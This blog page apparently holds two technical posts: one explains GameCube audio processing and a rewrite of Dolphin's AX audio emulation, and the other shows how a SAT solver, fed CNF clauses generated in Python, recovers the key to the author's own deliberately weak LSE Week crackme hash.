# Emulating the Gamecube audio processing in Dolphin

Written by Pierre Bourdon
2012-12-03 20:00:00

For the last two weeks, I've been working on enhancements and bug fixes related to audio processing in the Dolphin Emulator (the only Gamecube/Wii emulator that allows playing commercial games at the moment). Through this project I have learned a lot about how audio processing works in a Gamecube. Very little documentation is available on that subject, so I think writing an article explaining how it works might teach some new things to people interested in Gamecube/Wii homebrew or emulator development. This article was first published in 3 parts on the official Dolphin forums. Before publishing it on the blog, I made some small changes (mostly proof-reading and adding some complementary images) but most explanations are the same.

If you're interested in the code, it is available in the new-ax-hle branch on the official Google Code repository.

Let's start this exploration of audio emulation in a Gamecube emulator by looking at how the real hardware processes sound data.

## How sound is processed in a Gamecube

There are three main internal components related to sound in a Gamecube: the ARAM, the AI and the DSP:

• ARAM is an auxiliary memory which is used to store sound data. The CPU cannot access ARAM directly, it can only read/write blocks of data from RAM to ARAM (or from ARAM to RAM) using DMA requests. As ARAM is quite large, games often use it to store more than sound data: for example, WWE Day of Reckoning 2 uses it to store animation data (and a bug in DMA handling causes a crash because the data it writes is corrupted).
• The AI (Audio Interface) is responsible for getting sound data from RAM and sending it to your TV. It performs an optional sample rate conversion (32KHz -> 48KHz) and converts the data to an analog signal that is sent through the cables to your audio output device. The input data is read at a regular interval from RAM (not ARAM): usually, 32 bytes of input data are read every 0.25ms (each sound sample is 2 bytes, so 32 bytes is 16 sound samples, which is 8 stereo sound samples, and 8 stereo samples every 0.25ms == 32KHz sound).
• The DSP is what processes all the sounds a game wants to play and outputs a single stereo stream. Its job is to perform volume changes on the sounds and sample rate conversion (converting sounds stored at e.g. 4KHz, which take less space, to 32KHz sounds - this is needed because you can't mix together sounds that are not at the same rate). It can optionally do a lot of other stuff with the sounds (delaying to simulate 3D sound, filtering, handling surround sound, etc.).
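
As a sanity check of the numbers quoted in the AI description, the rate arithmetic can be reproduced in a few lines (a back-of-the-envelope sketch, not Dolphin code):

```python
# Back-of-the-envelope check of the AI numbers above:
# 32 bytes are fetched from RAM every 0.25 ms.
BYTES_PER_FETCH = 32
BYTES_PER_SAMPLE = 2           # 16-bit PCM samples
CHANNELS = 2                   # stereo
FETCH_INTERVAL_MS = 0.25

samples_per_fetch = BYTES_PER_FETCH // BYTES_PER_SAMPLE       # 16 mono samples
stereo_frames_per_fetch = samples_per_fetch // CHANNELS       # 8 stereo frames
fetches_per_second = 1000 / FETCH_INTERVAL_MS                 # 4000 fetches/s
sample_rate = stereo_frames_per_fetch * fetches_per_second

print(sample_rate)  # 32000.0 -> the 32KHz output rate
```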

Figure 1: Overview of all the components involved in audio processing in a Gamecube

ARAM and AI are not that hard to emulate: once you understand how they work, they are both simple chips which can only perform one function and don't communicate a lot with the CPU. You just need to have a precise enough timing for AI emulation, and everything is fine.

DSP is a lot harder to emulate properly, for two reasons I have not mentioned yet. First, it is a programmable CPU. All the mixing, filtering, etc. are part of a program that is sent to the DSP by the game, and the DSP behavior varies depending on the program it receives. For example, the DSP is not only used for sound processing, but also to unlock memory cards, and to cipher/decipher data sent to a GBA using the official link cable. Even for sound processing, not every game uses the same DSP code. The second reason is that it can communicate with the main Gamecube CPU, read RAM and ARAM and write to RAM. This allows games to use a complicated communication protocol between CPU and DSP.

We call a program running on the DSP a UCode ("microcode"). Because the DSP is programmable, it would seem like the only way to emulate it properly is to use low level emulation: running instructions one by one from a program to reproduce accurately what the real DSP does. However, while it is programmable, there are actually very few different UCodes used by games. On Gamecube, there are only 3 UCodes we know of: the AX UCode (used in most games because it is distributed with Nintendo's SDK), the Zelda UCode (called that way because it's used in Zelda games, but it is also used for some Mario games and some other first party games), and the JAC UCode (early version of the Zelda UCode, used in the Gamecube IPL/BIOS as well as Luigi's Mansion). That means if we can reproduce the behavior of these three UCodes, we can emulate the audio processing in most games without having to emulate the DSP instructions.

I started working on AX HLE 3 weeks ago because I want to play Skies of Arcadia Legends and Tales of Symphonia, two games that had completely broken audio with the previous AX HLE implementation. I added a new hack to "fix" the bug that caused bad music emulation, but fixing this made me even more interested in rewriting the whole thing to make it cleaner. I wasn't following Dolphin development when the current AX HLE was developed. However, it looks to me as if it was written without actually looking at the DSP code, only looking at what is sent to the DSP and what comes out. I don't know if people at the time had the capability to disassemble DSP code, but it is a very bad way to emulate AX anyway: some parts of the emulation code are completely WTF, and the more you understand how AX works the less you understand how the current AX HLE emulation was able to work and output sound in most cases. That's why, two weeks ago I decided I should start from scratch and re-implement AX HLE.

## AX UCode features and internals

AX is a low-level audio library for Gamecube games, which comes with a builtin UCode to perform audio signal processing on the DSP. I'll first talk about what it can do, then explain how the UCode knows what it should do.

Luckily, Nintendo gives us a lot of information about the role of the DSP in a patent filed on Aug 23 2000: US7369665, "Method and apparatus for mixing sound signals". Figures 8, 9A and 9B are especially interesting in our case because they describe precisely what the DSP does internally and how inputs and outputs interact with each other. That helps, but most of this information could already be discovered by reverse engineering the UCode anyway (I learned the existence of this patent pretty late).

The basic role of the DSP is to get several sounds and mix them together to give a single sound. The sounds that it has to mix are provided through a list of Parameter Blocks (PB). Each PB corresponds to a sound to be mixed. It contains where to find the input sound data, but also a lot of configuration options: input sample rate, sound volume, where it should be mixed and at what volume (left channel/right channel/surround), if the sounds loop, from where does the loop start, etc.

Figure 2: List of PBs with example fields. The PBADDR AX command gives the address of the first PB to the DSP.

Every 5ms AX gets a list of PBs and mixes each PB to 3 channels: Left, Right and Surround. It then sends 5ms of output to the RAM, at an address provided by the CPU. Sometimes being able to change sound data only every 5ms is not enough: to overcome that, each PB has a list of updates to be applied every millisecond. This allows sub-5ms granularity in sound mixing configuration. AX also provides a way to add audio effects on the L/R/S streams through the use of AUX channels. Each PB can be mixed to L/R/S but also to AUXA L/R/S and AUXB L/R/S. Then, the CPU can ask to get the contents of the AUXA and AUXB mixing buffers, replace them with its own data, and ask the DSP to mix AUXA and AUXB with the main L/R/S channels.
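
The 5ms frame structure described above can be sketched in Python (all names and the PB interface here are my invention for illustration; the real UCode works on fixed-point buffers in DSP memory): 5ms at 32KHz is 160 samples per frame, processed as five 1ms sub-blocks of 32 samples so that per-PB updates can apply every millisecond.

```python
# Hypothetical sketch of one AX 5ms frame (names are mine, not the UCode's).
SAMPLE_RATE = 32000
FRAME_MS = 5
SAMPLES_PER_MS = SAMPLE_RATE // 1000           # 32 samples per millisecond
SAMPLES_PER_FRAME = SAMPLES_PER_MS * FRAME_MS  # 160 samples per 5ms frame

def mix_frame(pbs):
    """Mix every parameter block into the L/R/S accumulators for one frame."""
    left = [0] * SAMPLES_PER_FRAME
    right = [0] * SAMPLES_PER_FRAME
    surround = [0] * SAMPLES_PER_FRAME
    for pb in pbs:
        for ms in range(FRAME_MS):
            pb.apply_updates(ms)               # the sub-5ms update list
            base = ms * SAMPLES_PER_MS
            for i in range(SAMPLES_PER_MS):
                s = pb.next_sample()           # sample, resampled to 32KHz
                left[base + i] += s * pb.volume_l
                right[base + i] += s * pb.volume_r
                surround[base + i] += s * pb.volume_s
    return left, right, surround
```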

That's about it for the main features of AX. Some more things can be done optionally (for example Initial Time Delay, used to delay one channel to simulate 3D sound) but they are not used that often by games. Let's see how the CPU sends commands to the DSP.

The DSP has two ways to communicate with the game: through DMA, which allows it to read or write to RAM at any address it wants, and through mailbox registers, which is a more synchronous way to exchange small amounts of data (32 bits at a time) with the CPU. Usually, mailbox registers are used for synchronization and simple commands. For more complicated commands the CPU sends an address to the DSP via mailbox, and the DSP gets the data at this address through DMA.

With AX, about the only thing received through mailboxes (excluding UCode switching stuff, which is not relevant to sound processing) is the address of a larger block of data which contains commands for the DSP. Here are a few commands that AX understands and that I have reverse engineered:

• Command 00: SETUP, initializes internal mixing buffers with a constant value or a value and a delta. Usually just initializes to 0.
• Command 02: PBADDR, gives the DSP the address in RAM of the first PB. Each PB contains the address of the next PB, so knowing only the address of the first PB is enough to get the whole list.
• Command 03: PROCESS, does all the audio processing and mixes the PBs to internal buffers.
• Command 04: MIX_AUXA, sends the contents of the AUXA buffers to the CPU, receives processed AUXA, and mixes it with the main channels.
• Command 05: MIX_AUXB, same as MIX_AUXA, but for AUXB.
• Command 06: UPLOAD_LRS, sends the contents of the main L/R/S channels to the CPU.
• Command 0D: MORE, reads more commands from RAM and starts executing them. I suspect this is used for long command lists, but I've never seen it used.
• Command 0E: OUTPUT, interlaces the L/R channels, clamps to 16 bits and sends the result to RAM, where it will most likely get picked up by the Audio Interface.
• Command 0F: END, signals the end of a command list.

A few more commands exist, but these commands are the main things to handle to get audio working in most games I've found. Actually, only handling PBADDR, PROCESS, OUTPUT and END should allow about 90% of games to have some of the audio working (without stuff like AUX effects, used for echo/reverb).
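
As an illustration, the dispatch of such a command list could look like the following sketch (the argument counts and the handler interface are made up for the example; the real commands carry their parameters inline in the list):

```python
# Hypothetical sketch of walking an AX command list until END (0x0F).
CMD_SETUP, CMD_PBADDR, CMD_PROCESS = 0x00, 0x02, 0x03
CMD_OUTPUT, CMD_END = 0x0E, 0x0F

def run_command_list(cmds, handlers):
    """Dispatch command words; handlers maps a command to (nargs, callback)."""
    i = 0
    while i < len(cmds):
        cmd = cmds[i]
        i += 1
        if cmd == CMD_END:
            break                      # END terminates the list
        nargs, fn = handlers[cmd]
        fn(*cmds[i:i + nargs])         # pass the inline parameters
        i += nargs
```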

When AX is done handling a command list, it sends an interrupt to the CPU to signal that it is ready to receive more data. This is very important because it is the only way for the CPU to know that the data it requested to be uploaded from the DSP is actually valid and done copying/processing. Then, at the next 5ms tick, the CPU will send a new command list to the DSP, and the cycle repeats.

Figure 3: Timeline of an AX 5ms frame handling

## AX HLE in Dolphin, previous vs. new

DSP HLE was developed at a time when people did not know much about how the Gamecube DSP worked. It was basically a hack to have sound in games, and more hacks were added on top of that hack to try and fix bugs. The AX UCode emulation is probably the most hacky thing in the DSP HLE code. For example, some of the code that is used looks like this:

```c
// TODO: WTF is going on here?!?
// Volume control (ramping)
static inline u16 ADPCM_Vol(u16 vol, u16 delta)
{
    int x = vol;
    if (delta && delta < 0x5000)
        x += delta * 20 * 8; // unsure what the right step is
        //x += 1 * 20 * 8;
    else if (delta && delta > 0x5000)
        //x -= (0x10000 - delta); // this is to small, it's often 1
        x -= (0x10000 - delta) * 20 * 16; // if this was 20 * 8 the sounds in Fire Emblem and Paper Mario
                                          // did not have time to go to zero before the were closed
        //x -= 1 * 20 * 16;

    // make lower limits
    if (x < 0) x = 0;
    //if (pb.mixer_control < 1000 && x < pb.mixer_control) x = pb.mixer_control; // does this make
                                                                                 // any sense?

    // make upper limits
    //if (mixer_control > 1000 && x > mixer_control) x = mixer_control; // maybe mixer_control also
                                                                        // has a volume target?
    //if (x >= 0x7fff) x = 0x7fff; // this seems a little high
    //if (x >= 0x4e20) x = 0x4e20; // add a definitive limit at 20 000
    if (x >= 0x8000) x = 0x8000; // clamp to 32768;
    return x; // update volume
}
```

I don't even know how this code evolved to become what is displayed here; I just know that it is not a good way to implement AX HLE. Also, some of the design choices in the previous implementation just couldn't allow for accurate HLE.

The first issue is that the audio emulation pipeline was simply not correct: the AI was completely bypassed, and sound went directly from the DSP to the emulated audio mixer, without being copied to RAM at any time. This "kind of" works but completely breaks CPU audio effects... which aren't emulated anyway.

Figure 4: Audio emulation pipeline in the previous AX HLE implementation

But the biggest issue is the timing on which AX HLE was working. On real hardware, the DSP runs on its own clock. At some point the CPU sends commands to it, it processes all of these commands as fast as possible, and sends a message back to the CPU when it's done. The CPU copies the processed data, then when it needs more data (in most cases, 5ms later) it sends new commands to the DSP. In the previous AX HLE implementation, none of that was right. What the emulated AX did was:

• As soon as we get the command that specifies the sounds that should be mixed, copy the sound data address somewhere.
• Every 5ms, send a message to the CPU saying that we processed the commands (even though no commands were processed).
• When the audio backend (ALSA, XAudio, DirectSound) requires more data, mix the sound and return audio data.

Basically, nothing was right in the timing. That implementation allows for some cool hacks (like having the audio running at full speed even though the game is not running at 100% speed), but it is inaccurate and bug-prone.

When trying to fix the "missing instruments" bug affecting the games I wanted to play, I noticed all these timing issues and thought about rewriting AX HLE (once again... I always wanted to rewrite AX HLE every time I looked at the code). The hack fix (re4d18e3a8b7c) that I found to compensate for the timing issues really did not satisfy me, and knowing more about AX HLE I noticed that rewriting it was actually not as hard as I thought it would be. After working for 24h straight on new-ax-hle, I finally got a first working version which had OK sounds and music in Tales of Symphonia.

The design in new-ax-hle is in my opinion a lot better than the design used in the previous AX HLE:

• A DSP Thread is created when the UCode is loaded. This thread will be responsible for all the sound mixing work the DSP does.
• When we get commands from the CPU, we copy the command list to a temporary buffer, and wake up the DSP Thread to tell it we have commands to process.
• The DSP Thread handles the commands, sends a message to the CPU when it's done, and goes back to sleep.
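
The three steps above can be sketched as a worker thread waiting on a condition variable (a simplified Python analogy of the design, not Dolphin's actual C++ code):

```python
import threading

# Simplified analogy of the new-ax-hle threading model: the CPU side queues
# a command list and wakes the DSP thread; the DSP thread processes it and
# signals completion (the "interrupt" back to the CPU).
class DSPThread:
    def __init__(self, process_cmds, raise_interrupt):
        self.process_cmds = process_cmds
        self.raise_interrupt = raise_interrupt
        self.cond = threading.Condition()
        self.pending = None
        self.running = True
        self.thread = threading.Thread(target=self._loop, daemon=True)
        self.thread.start()

    def send_commands(self, cmds):       # called from the CPU thread
        with self.cond:
            self.pending = list(cmds)    # copy to a temporary buffer
            self.cond.notify()           # wake up the DSP thread

    def _loop(self):
        while True:
            with self.cond:
                while self.pending is None and self.running:
                    self.cond.wait()     # sleep until there is work
                if not self.running:
                    return
                cmds, self.pending = self.pending, None
            self.process_cmds(cmds)      # all the mixing work happens here
            self.raise_interrupt()       # tell the CPU we are done

    def stop(self):
        with self.cond:
            self.running = False
            self.cond.notify()
        self.thread.join()
```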

It is basically the exact same model DSP LLE on Thread (another DSP configuration option in Dolphin) uses, with less synchronization (LLE tries to match the number of cycles executed on CPU and DSP, which causes some extra performance hit). This also kind of matches what happens on the real hardware, using 2 chips instead of 2 threads. However, this also means the audio processing speed is tied to the CPU speed: if the CPU cannot keep up, it won't send commands often enough and the audio backend won't receive enough data to avoid stuttering.

Figure 5: Comparison of processing timelines. On the left, previous implementation. On the right, new-ax-hle.

Another change, this time not exactly linked to overall design, is that the new-ax-hle now handles most AX commands instead of only the one specifying the first parameter block address like the old AX does. Some of these other commands are used to set up global volume ramping, send data back to the main RAM, mix additional data from the RAM, or output samples to the buffers used by the audio interface. This means new-ax-hle now follows the correct audio emulation pipeline: ARAM -> DSP -> RAM -> AI -> Output (instead of the pipeline used before: ARAM -> DSP -> Output). This also means some CPU sound effects like echo, reverb, etc. should work fine.

Figure 6: Audio emulation pipeline in the new AX HLE implementation

Overall, the more I fix bugs in new-ax-hle, the more I'm amazed the previous AX HLE could work so well. It is a pile of hacks, implementing only 2/19 AX commands (and one of these commands is not even implemented correctly), with a completely wrong timing, and some ugly code that makes no sense. I don't blame the previous authors of this code - at the time, documentation about the DSP was a lot sparser, and analyzing UCodes had to be done with a text editor because there was no awesome IDA plugin for the GC DSP.

## Conclusion

At the time I'm writing this article, new-ax-hle works a lot better than the previous AX HLE in most Gamecube games, and only a few remaining bugs are known in GC games. The Wii AX code is a bit less mature and is more like a proof of concept: I haven't really worked a lot on it, and after one or two weeks of bug fixing it should also become pretty much perfect, including Wiimote audio emulation (which was only supported with LLE previously). I'm hoping this code will be merged for 4.0, and I'll most likely be working on Zelda UCode HLE next (which has a less ugly implementation but has the same design issues as AX).

Thanks to Pierre-Marie (pmderodat@lse) for his nice Inkscape-made pictures.

# Using SAT and SMT to defeat simple hashing algorithms

Written by Pierre Bourdon
2012-07-31 18:30:00

Note: this article uses MathJax to display formulas written in TeX. Please enable JavaScript in order to see the formulas correctly.

One week has passed since the end of LSE Week 2012 and I have received several partial solutions for the crackme that was released at the start of LSE Week for people to play with. Most people who bothered writing partial solutions were able to break the packing and anti-debugging parts of it, but stopped at the very end when they faced a simple hashing algorithm they had to reverse to generate a valid key for the crackme. In pseudocode, the algorithm was the following:

```
a, b, c, d are the four 32 bits integers given as input (key)

Compute a simple checksum in order to avoid having several good
solutions to the problem:
    if ((ROTL((a ^ b) - (c ^ d), 17) ^ (a + b + c + d)) != 0xa6779036)
        return 0;

Kind of useless step just to make things a bit harder:
    a = a XOR c
    b = b XOR d

Then, 128 times in a row, for each integer:
    Shuffle the bits of the number (using a predefined table)
    XOR the number with a predefined constant
    Rotate left the number by N bits (N being another constant)

Check if:
    a == 0x8e2c4c74
    b == 0xa6c27e2a
    c == 0xf5e15d3d
    d == 0x7bebc2ba
```

Clever people might notice that all of the operations done by that "hashing" algorithm are actually non destructive and completely reversible. That means our hashing function is bijective (no collisions) and that it is very easy to get the input from the output: just run it in reverse (rotate left becomes rotate right, XOR stays the same, shuffle uses a slightly modified table). It was meant to keep the crackme easy to crack once the code has been recovered and understood. Unfortunately, some last minute bugs cropped up in the implementation of the algorithm (never try to fix bugs at 4AM without automated tests...) and made the algorithm completely different:

```
a, b, c, d are the four 32 bits integers given as input (key)

Compute a simple checksum in order to avoid having several good
solutions to the problem:
    if ((ROTL((a ^ b) - (c ^ d), 17) ^ (a + b + c + d)) != 0xa6779036)
        return 0;

a = a XOR c
b = b XOR d

Then, 128 times in a row, for each integer:
    Shuffle the bits of the number using a table that might map some
    bits two times, and some other bits zero times (DESTRUCTIVE)
    XOR the number with a predefined constant
    Rotate left the number by N bits (N being another constant), except
    if this is the last number - in this case, rotate the third integer
    and use it as the new value for the last integer

Check if:
    a == 0x8e2c4c74
    b == 0xa6c27e2a
    c == 0xf5e15d3d
    d == 0x7bebc2ba
```
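
To see concretely why the intended (bug-free) round was trivially reversible, here is a toy 8-bit version of one round and its inverse (the permutation, XOR constant and rotation amount are made up for the example):

```python
# Toy 8-bit round: a bit permutation, a XOR with a constant, a left
# rotation -- each step has an exact inverse, so the round does too.
PERM = [3, 1, 4, 6, 0, 7, 2, 5]            # output bit j reads input bit PERM[j]
INV_PERM = [PERM.index(j) for j in range(8)]
KEY, ROT = 0x5A, 3

def rotl(x, n, w=8):
    return ((x << n) | (x >> (w - n))) & ((1 << w) - 1)

def rotr(x, n, w=8):
    return rotl(x, w - n, w)

def shuffle(x, table):
    return sum(((x >> table[j]) & 1) << j for j in range(8))

def round_fwd(x):
    return rotl(shuffle(x, PERM) ^ KEY, ROT)

def round_inv(y):
    # Undo each step in reverse order: rotate right, XOR, inverse shuffle.
    return shuffle(rotr(y, ROT) ^ KEY, INV_PERM)
```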

The first error (in the shuffling part) comes from an indexing error in my bits position table. The table was defined like this:

```c
// Maps the input bit position to the output bit position
static const char mapping[128] = {
    // First integer
    2, 14, 4, 24, 7, 31, 16, 18, 30, 17, 12, 27, 6, 26, 9, 22,
    1, 28, 5, 3, 11, 23, 13, 25, 19, 20, 10, 29, 8, 15, 21, 0,

    // Second integer
    26, 20, 15, 27, 28, 14, 21, 7, 17, 22, 31, 12, 4, 13, 8, 10,
    23, 19, 18, 25, 9, 2, 5, 11, 6, 3, 24, 1, 0, 30, 29, 16,

    // Third integer
    4, 26, 20, 13, 21, 29, 3, 14, 5, 22, 18, 6, 28, 23, 16, 10,
    15, 27, 25, 1, 17, 0, 30, 2, 8, 24, 7, 9, 31, 19, 12, 11,

    // Fourth integer
    8, 22, 26, 1, 20, 2, 30, 23, 6, 9, 0, 14, 18, 31, 3, 21,
    4, 29, 24, 7, 12, 28, 16, 25, 11, 17, 19, 27, 5, 10, 15, 13
};
```

But the indexing was done like this:

```c
// *pn points to the current integer, i is the index of this integer (0, 1,
// 2 or 3), j is the current bit.
newn |= ((*pn >> scramble[(i << 2) + j]) & 1) << j;
```

That i << 2 should actually be an i << 5 in order to use the whole mapping table. This bug makes the algorithm destructive because some bits from the input will not be used to generate the output. That means you can't get the input of a step from its output: the destroyed bits could have been 0 or 1.
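
The effect of the bug can be checked directly against the mapping table above: with i << 5 each integer reads a full 32-entry permutation, while with i << 2 the four index ranges overlap, so some source bits are read twice and others never.

```python
# The mapping table from the crackme, flattened to 128 entries.
mapping = [
    # First integer
    2, 14, 4, 24, 7, 31, 16, 18, 30, 17, 12, 27, 6, 26, 9, 22,
    1, 28, 5, 3, 11, 23, 13, 25, 19, 20, 10, 29, 8, 15, 21, 0,
    # Second integer
    26, 20, 15, 27, 28, 14, 21, 7, 17, 22, 31, 12, 4, 13, 8, 10,
    23, 19, 18, 25, 9, 2, 5, 11, 6, 3, 24, 1, 0, 30, 29, 16,
    # Third integer
    4, 26, 20, 13, 21, 29, 3, 14, 5, 22, 18, 6, 28, 23, 16, 10,
    15, 27, 25, 1, 17, 0, 30, 2, 8, 24, 7, 9, 31, 19, 12, 11,
    # Fourth integer
    8, 22, 26, 1, 20, 2, 30, 23, 6, 9, 0, 14, 18, 31, 3, 21,
    4, 29, 24, 7, 12, 28, 16, 25, 11, 17, 19, 27, 5, 10, 15, 13,
]

def source_bits(i, shift):
    """Source bit positions read for integer i with the given index shift."""
    return [mapping[(i << shift) + j] for j in range(32)]

for i in range(4):
    good = set(source_bits(i, 5))   # correct indexing: 32 distinct bits
    bad = set(source_bits(i, 2))    # buggy indexing: fewer for i > 0
    print(i, len(good), len(bad))
```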

The second bug is actually a stupid typo:

```c
a = ROTL(a, 7);
b = ROTL(b, 13);
c = ROTL(c, 17);
d = ROTL(c, 25);
```

I don't think this requires much explanation.

Now that the context of this article has been explained, the real question for me was the following: do these errors make the crackme unsolvable or can it still be solved easily using either bruteforce or more complex analysis techniques?

## SAT and its applications to cryptography

I started writing a bruteforcer for this hash using backtracking for each destroyed bit and only exploring the branches that would be valid later on by predicting as much as possible. Unfortunately, while that worked for a small number of iterations of the hash, the original algorithm used 128 iterations and the number of possible combinations increased a lot too fast to use such a simple technique.

Two days later I got reminded by a friend of a talk presented by Mate Soos at Hackito Ergo Sum 2011 about SAT solvers and their application to cryptography for breaking weak ciphers and hashes. Mate is the author of CryptoMiniSat, a very fast implementation of SAT with a few tweaks that can be used to increase efficiency for crypto usages.

Before going into the details of how to use SAT to break ciphers, let's talk a little bit about SAT solvers. SAT solvers are programs designed to solve the Boolean Satisfiability Problem, which can be expressed very simply: given a boolean formula, can you find values for the variables that make the formula true? This is an NP-complete problem (which means you can't solve the general case of that problem in polynomial time, only exponential time or slower) and is actually kind of the canonical NP-complete problem: a very common technique for proving that a problem is NP-complete is to reduce SAT to it.

Most SAT solvers take their input in a format called DIMACS, which is an easy-to-parse representation of boolean formulas in CNF (Conjunctive Normal Form). A CNF formula is a special case of boolean formula which is always written like this:

$$(X_i \vee \neg X_j) \wedge (\neg X_k \vee X_l \vee \neg X_m \vee X_n) \wedge \ldots$$

Basically, CNF is a logical product (aka. conjunction) of sums of variables or negated variables ($$\neg A$$). Every boolean formula can be converted into an equivalent CNF formula, either manually (distribute the $$\vee$$ over products) or through an automated process (there are some conversion tables between simple boolean equations and their CNF equivalent).
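
As a quick illustration of the manual conversion, distributing $$\vee$$ over $$\wedge$$ turns $$(A \wedge B) \vee C$$ into the CNF formula $$(A \vee C) \wedge (B \vee C)$$, which a brute-force check over all assignments confirms:

```python
from itertools import product

# (A AND B) OR C  ==  (A OR C) AND (B OR C): distribute OR over AND.
def original(a, b, c):
    return (a and b) or c

def cnf(a, b, c):
    return (a or c) and (b or c)

# Both formulas agree on all 8 possible truth assignments.
assert all(original(*v) == cnf(*v) for v in product([False, True], repeat=3))
```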

SAT solvers have a lot of applications and tend to be heavily optimized in order to have extremely good performance in most cases. It is common to solve SAT problems with several hundred thousand clauses (a clause is a single sum of variables, like $$A \vee B \vee \neg C \vee D$$) and tens of thousands of variables.
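
For reference, here is what a hand-written DIMACS file looks like for the CNF formula $$(X_1 \vee \neg X_2) \wedge (X_2 \vee X_3)$$ (a small illustration, not output from the tools discussed here):

```
c comment lines start with "c"; the header gives #variables and #clauses
p cnf 3 2
1 -2 0
2 3 0
```

Each clause is a line of variable indices terminated by 0, with negation written as a minus sign.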

In his talk last year, Mate Soos told us about how HiTag2 (a cryptosystem used in car locks) was reverse engineered, then translated to mathematical formulas and finally converted to CNF formulas describing the relations between input bits and output bits. If you are interested in that talk, it is available on YouTube. I thought that this technique might be of some use in breaking my hash algorithm and started translating the hash algorithm to an equivalent CNF representation.

## Breaking the hash with SAT

First of all, the definition of the algorithm would most likely require several thousand clauses and about as many variables, so writing it by hand is out of the question. I started by writing a very simple library to generate DIMACS files, which exposes the following Python API:

• CNFGenerator.new_var() generates a new SAT variable instance, which has only one operation: logical negation (written -x)
• CNFGenerator.add(v1, v2, ..., vN) adds a clause to the output DIMACS file
• CNFGenerator.output() outputs the DIMACS representation

CryptoMiniSAT also provides a very useful extension to DIMACS for cryptographical uses: the ability to use XOR clauses which are $$A \oplus B \oplus C \oplus \ldots$$. These prove very useful in order to write equivalences ($$A \Leftrightarrow B \equiv \neg (A \oplus B) \equiv \neg A \oplus B$$) or simply XOR relations. CNFGenerator.add_xor handles the generation of such clauses.

Let's start by defining our input variables. They are four vectors of 32 bits, so 128 boolean variables:

```python
def cnf_int(gen, bits):
    return [gen.new_var() for i in range(bits)]

# Input variables
a = cnf_int(gen, 32)
b = cnf_int(gen, 32)
c = cnf_int(gen, 32)
d = cnf_int(gen, 32)
```

If you follow the pseudocode above, the next step would normally be the checksum. This is actually the hardest part of this algorithm to formalize because of the arithmetic operations (additions and subtractions of 32 bits numbers). We'll do that last. The following step is a ^= c; b ^= d. This is quite easy to formalize. Let's do it for the general case, i.e. a = b ^ c. What this does is "make each bit of a equal to the same bit of b XOR the same bit of c". To formalize it, we can introduce a new variable $$A$$ which is equivalent to $$B \oplus C$$, which means the clause is true iff $$A$$ has the same value as $$B \oplus C$$. We just need to write that in a form that CryptoMiniSat can understand:

\begin{aligned} A \Leftrightarrow (B \oplus C) & \equiv \neg (A \oplus (B \oplus C)) \\\\ & \equiv \neg (A \oplus B \oplus C) \\\\ & \equiv \neg A \oplus B \oplus C \end{aligned}

Applied to the 32 bits of the variables and converted to Python, this gives us the following code:

```python
def cnf_xor(gen, a, b):
    out = [gen.new_var() for i in range(len(a))]
    for (a, b, o) in zip(a, b, out):
        gen.add_xor(-a, b, o)
    return out

# a ^= c, b ^= d
a = cnf_xor(gen, a, c)
b = cnf_xor(gen, b, d)
```

Next comes the core of the hashing algorithm: the iterated loop shuffling the bits, XOR-ing with a constant and rotating the number. The interesting part here is that shuffling and rotating bits does not require any clause or additional variables for the SAT representation of the algorithm: For example, if you have a 4 bit integer represented as the vector $$A_3 A_2 A_1 A_0$$, rotating it to the left by 2 bits transforms it to the vector $$A_1 A_0 A_3 A_2$$. You just need to swap the elements in the list representing your variables. This gives us the following Python code:

```python
def cnf_rotl(gen, n, b):
    """Performs a left rotation of n by b bits"""
    return n[-b:] + n[:-b]

def cnf_hash(gen, a, b, c, d):
    """Hashes a, b, c, d, returns new a, new b, new c, new d"""
    out = []
    for i, n in enumerate((a, b, c, d)):
        scrambled = [n[SCRAMBLE_TABLE[i][j]] for j in range(len(n))]
        xored = cnf_xor_const(gen, scrambled, XOR_TABLE[i])
        out.append(xored)
    out[0] = cnf_rotl(gen, out[0], ROT_TABLE[0])
    out[1] = cnf_rotl(gen, out[1], ROT_TABLE[1])
    out[2] = cnf_rotl(gen, out[2], ROT_TABLE[2])
    out[3] = cnf_rotl(gen, out[2], ROT_TABLE[3])
    return out

# Iterate the hash 128 times for a, b, c and d
for i in range(128):
    a, b, c, d = cnf_hash(gen, a, b, c, d)
```

cnf_xor_const works the same as cnf_xor but "optimized" in order to XOR with a constant number instead of a variable number.

Now that we computed the hashed values, we just need to put some clauses to make sure they are equal to the hash we are looking for. In the crackme, the hash value was 8e2c4c74a6c27e2af5e15d3d7bebc2ba. To make sure one of our boolean vectors is equal to a constant value, we add one clause per bit of the vector which forces it to True if the corresponding bit in the constant value is 1, and False if the bit is 0:

```python
def cnf_equal(gen, n, c):
    for i in range(len(n)):
        b = c & 1
        c >>= 1
        if b:
            gen.add(n[i])
        else:
            gen.add(-n[i])

# Check for equality
cnf_equal(gen, a, 0x8e2c4c74)
cnf_equal(gen, b, 0xa6c27e2a)
cnf_equal(gen, c, 0xf5e15d3d)
cnf_equal(gen, d, 0x7bebc2ba)
```

With only this code, the SAT solver will generate us values for a, b, c and d that compute to the hash we are looking for. However, we still have to defeat the checksum. Let's look at its code again:

```c
if ((ROTL((a ^ b) - (c ^ d), 17) ^ (a + b + c + d)) != 0xa6779036)
    return 0;
```

We already know how to compute XORs, rotations and how to check for number equality, so the remaining part is additions and subtractions on 32 bit numbers. As you may already know, subtraction is actually very easy to implement in terms of addition and two's complement, which is itself very easy to implement in terms of binary inversion and addition:

$$x - y \equiv x + COMPL2(y) \equiv x + INVERT(y) + 1$$

```python
def cnf_invert(gen, n):
    inv = [gen.new_var() for b in n]
    for (b, i) in zip(n, inv):
        gen.add(b, i)
        gen.add(-b, -i)
    return inv

def cnf_sub(gen, a, b):
    invb = cnf_invert(gen, b)
    complb = cnf_add(gen, invb, cnf_const32(gen, 1))
    return cnf_add(gen, a, complb)
```

Addition on 32 bit integers is however a lot harder to define. If you did a bit of electrical engineering or if you have implemented an ALU (in HDL, with wires and logic gates, or even in Minecraft) you may know a very common way to define addition using two half adders to make a 1 bit full adder. Here is what a full adder looks like (image courtesy of Wikipedia):

It takes two bits, A and B, as well as a carry from a previous adder (Cin), and outputs the sum A + B + Cin and the carry resulting from that sum Cout. You can then chain these 1 bit full adders to make a 32 bit adder (again, image from Wikipedia):

Writing the truth table of a 1 bit full adder and simplifying the equations a bit, you get the following equations for S and Cout from A, B and Cin:

\begin{aligned} S & \equiv \overline{A} B \overline{C_{in}} \vee A \overline{B} \overline{C_{in}} \vee \overline{A} \overline{B} C_{in} \vee A B C_{in} \\\\ C_{out} & \equiv A B \vee A C_{in} \vee B C_{in} \end{aligned}
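
These minterms are easy to brute-force check against the arithmetic definition of a full adder: the sum is the XOR of the three inputs, and the carry-out is the majority function.

```python
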